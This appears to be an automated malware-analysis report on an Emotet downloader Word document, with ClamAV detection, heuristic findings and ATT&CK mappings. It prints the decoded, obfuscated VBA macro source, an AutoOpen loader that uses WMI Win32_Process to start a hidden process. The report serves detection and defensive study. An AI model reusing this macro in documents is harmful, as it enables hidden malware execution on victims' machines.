MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing an obfuscated VBA macro. The macro's autoopen subroutine is designed to execute a payload, likely a downloader, by leveraging WMI to create a new process. This behavior is characteristic of Emotet, which often uses such methods to fetch and execute further stages.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3177 bytes |
SHA-256: 55ab2ad968f793a5833e29eae0e781f520777c6117cf9b41f877d10e93237fbf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pC7jD6"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "qiQicnD3, 0, 0, MSForms, TextBox"
Attribute VB_Control = "m85VQQ, 1, 1, MSForms, TextBox"
Attribute VB_Name = "zf5QvS"
Public Sub _
autoopen()
Debug.Print _
"953" + ("57") + ("SHVTGNQ" + ("274" + "938") + "wVvkIj" + ("zGE6t7c"));
Debug _
.Print "429" _
+ ("722") + ("ZBDvJzoR" + ("755" + "879") + "sa34d4" + ("d2iIdSN"));
Debug.Print "615" + ("395") + _
("clBiI6ll" + ("796" + "479") + "j45Nf3C" + ("aJVoi7S"));
VooVDtz8 (uGGhl1)
Debug.Print _
"63" + ("965") + ("Jl5QY6Q" + ("713" + "78") + "d86Uow" + ("i0XK2w"));
Debug _
.Print "664" _
+ ("829") + ("jEHju7" + ("525" + "155") + "ncCzqR" + ("i1fM0o_j"));
Debug.Print "815" + ("427") + _
("lFGdZhJ" + ("40" + "207") + "Z55jI7kf" + ("mOUuiGdh"));
End Sub
Sub VooVDtz8(FYdqVk)
RWvjiu = H9JGmzz3(H9JGmzz3("win" + H9JGmzz3(H9JGmzz3("mgmts:w")) + "in32_process"))
Debug.Print _
"571" + ("844") + ("XUrtUowo" + ("208" + "85") + "dAf8Nd" + ("VS2cAhuq"));
Debug _
.Print "931" _
+ ("41") + ("mpBuV6_" + ("73" + "394") + "iS3moV" + ("F1tSJiO"));
Debug.Print "716" + ("787") + _
("lK4vR5" + ("989" + "757") + "Z8VBGR" + ("wGVXaG"));
Set mLWSc26 = GetObject(H9JGmzz3(H9JGmzz3(RWvjiu + "startup")))
Debug.Print _
"624" + ("107") + ("BnVViU" + ("263" + "938") + "JjFbOUG" + ("zodBoXC5"));
Debug _
.Print "663" _
+ ("264") + ("VUcid9b" + ("587" + "45") + "GNB7qA2" + ("PN2ailr0"));
Debug.Print "444" + ("424") + _
("KswMo8vW" + ("669" + "740") + "AVzmbW" + ("ElUNdB74"));
mLWSc26 _
.ShowWindow = (0 / 1)
Debug.Print _
"89" + ("438") + ("GsBaDO" + ("718" + "808") + "rXzdt3" + ("EUBls0_R"));
Debug _
.Print "772" _
+ ("912") + ("HcqHLop" + ("898" + "774") + "ozu6P8n" + ("PYWCSh"));
Debug.Print "8" + ("44") + _
("Xwha0Xrq" + ("292" + "84") + "wmzPz9Dv" + ("XNOvGo"));
Debug.Print GetObject(H9JGmzz3(RWvjiu)).Create(jdABuPY + H9JGmzz3("p") + pC7jD6.m85VQQ + pC7jD6.qiQicnD3 + cQVX3cc, CvC0qa, mLWSc26, QMNQD2o);
Debug.Print _
"748" + ("853") + ("R4oDMqO" + ("737" + "650") + "CtwNJu" + ("IVOMH0wn"));
Debug _
.Print "384" _
+ ("794") + ("DXdLRj_K" + ("165" + "239") + "VI7sJrhT" + ("nPHrhF"));
Debug.Print "415" + ("48") + _
("OJEqPk7k" + ("754" + "372") + "jhz_CEdr" + ("m0mOEl"));
End Sub
Function H9JGmzz3(pJNhqU)
Debug.Print _
"692" + ("479") + ("cPFL19M" + ("440" + "53") + "kNBSwdX" + ("lpMXuj"));
Debug _
.Print "605" _
+ ("274") + ("hEAN8S" + ("761" + "924") + "iK2h6zrd" + ("AT2lq4Ct"));
Debug.Print "447" + ("322") + _
("BBvUsAF_" + ("4" + "550") + "iizpc91" + ("dBUNZhDQ"));
H9JGmzz3 = fpJ1zkF + pJNhqU + a1cnM8H
Debug.Print _
"943" + ("722") + ("VmVi3sc" + ("719" + "97") + "B1NFcp" + ("HhZG8Xf4"));
Debug _
.Print "174" _
+ ("409") + ("j5ZWXh5" + ("647" + "998") + "T7JV8pS" + ("YB79AjY"));
Debug.Print "109" + ("377") + _
("QOVXHb" + ("853" + "714") + "rsw5BLwB" + ("tjYDp9"));
End Function
Attribute VB_Name = "HwQKGUJl"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.